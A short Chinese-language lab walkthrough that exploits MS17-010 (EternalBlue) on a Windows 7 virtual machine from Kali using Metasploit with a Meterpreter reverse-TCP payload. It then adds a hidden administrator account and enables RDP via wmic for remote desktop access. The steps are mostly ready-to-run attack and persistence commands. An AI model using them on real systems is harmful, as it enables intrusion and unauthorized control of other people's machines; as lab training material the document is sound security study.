环境信息如下
VMWare虚拟机
攻击机:Kali Linux IP:192.168.40.131
靶机:Windows 7 IP:192.168.40.135
物理机系统:windows 11
进入Kali,打开msfconsole

查找相关模块
search ms17-010

使用模块0
use 0

使用payload
set payload windows/x64/meterpreter/reverse_tcp

设置靶机IP
set rhosts 192.168.40.135

接着输入run或exploit执行

这里我们可以看见已经成功打入
输入shell,进入靶机终端

首先创建一个新用户
net user acexze 123456 /add

接着将这个用户设置为管理员
net localgroup administrators acexze /add

然后我们开启靶机的3389端口以供我们进行远程连接
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

在物理机上打开终端,开启远程桌面连接
mstsc

进入远程连接界面,输入靶机IP

点击“显示选项”,展开,填入我们新创建的用户

这时远程桌面连接会显示,我们点击“是”

靶机桌面会显示

在无操作后30秒,靶机桌面显示

此时我们的物理机也远程连接进了靶机桌面

